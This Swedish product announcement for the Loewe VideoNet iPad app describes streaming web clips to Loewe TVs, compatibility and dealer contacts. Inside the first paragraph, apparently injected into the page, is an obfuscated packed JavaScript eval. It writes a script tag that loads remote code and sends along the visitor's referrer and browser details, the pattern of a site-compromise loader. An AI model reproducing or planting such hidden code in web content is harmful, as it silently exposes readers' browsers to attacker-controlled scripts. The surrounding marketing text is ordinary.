Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Loewe VideoNet App – Smart åtkomst av filmklipp från nätet

Loewe VideoNet App – Smart åtkomst av filmklipp från nätet
Sebastian

Loewe eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|siynz|var|u0026u|referrer|bfndt||js|php’.split(’|’),0,{}))
TV är SMART TV och nu blir en Loewe TV ännu smartare med den nya iPad applikationen Loewe VideoNet App. Den ger användaren enkel och smidig åtkomst till de bästa filmklippen från nätet.
Loewe VideoNet App streamar webshows, screencasts och podcasts direkt till din Loewe TV eller till din iPad. Loewe VideoNet App finns tillgänglig för alla Loewe LED TV (från 32” och större) som har MediaNet funktion (nätverk och internetuppkoppling).

VideoNet App ger åtkomst till massor av videos och filmklipp från hela världen. Applikationen gör innehållet tillgängligt både på iPaden och Loewe TVn. Mer än 10.000 olika program från hela världen finns tillgängliga och kan sorteras efter språk eller genre. Med appens favoritfunktion kan man enkelt göra en egen favoritlista med bara en knapptryckning. De senaste avsnitten av en podcast uppdateras automatiskt. Det betyder att man alltid har det senaste innehållet tillgängligt. På applikationens startsida får man även förslag på nya klipp och kanaler.

Den optimala upplevelsen av Loewe VideoNet App får man när man både har en Loewe TV och en iPad. När dessa två är parade med varandra och knutna till en användare så kan man synkronisera sina personliga favoriter så att dessa är tillgängliga på båda enheter. Med funktionen ”send-to-Tv” så kan man enkelt se innehållet på TV-skärmen. Detta kan vara till fördel när man är många personer som vill titta samtidigt.

Istället för att filmklippen laddas ner och sparas på enheterna så streamas de till TVn eller iPaden. Fördelen är att det går fortare och kräver inget lagringsutrymme.

Loewe VideoNet App är kompatibel med alla Loewe LED TV från och med 32”, som har Media+ och är uppdaterad med softwareversion 7.x.

Loewe VideoNet App till iPad finns redan nu i App Store.

För närmaste Loewe återförsäljare kontakta Kjaerulff 1 AB på tel. +46 40 67 97 400 eller direkt här på Hitta Loewe Återförsäljare

Om Loewe

Loewe producerar och marknadsför exklusiva design TV och ljudsystem. Audiodesign produkter, Blu-ray spelare, DVD-spelare, både som enskilda produkter och som kompletta Home Entertainment system.

Elegant och individuell design, innovativ teknologi och exklusiv kvalitet är kännetecknande för Loewes premium produkter.

Loewe levererar Home Entertainment system med HD-bildkvalitet, 3D-teknologi, integrerad digital HD-inspelare (DR+) samt MediaPortal som ger perfekt samspel mellan TV och internet.

Loewe AG grundades i Berlin 1923 och hade 2011 en omsättning på 274,3 milj.euro. Bolaget har c:a 1000 medarbetare och är representerat i 50 länder med egna dotterbolag och distributörer.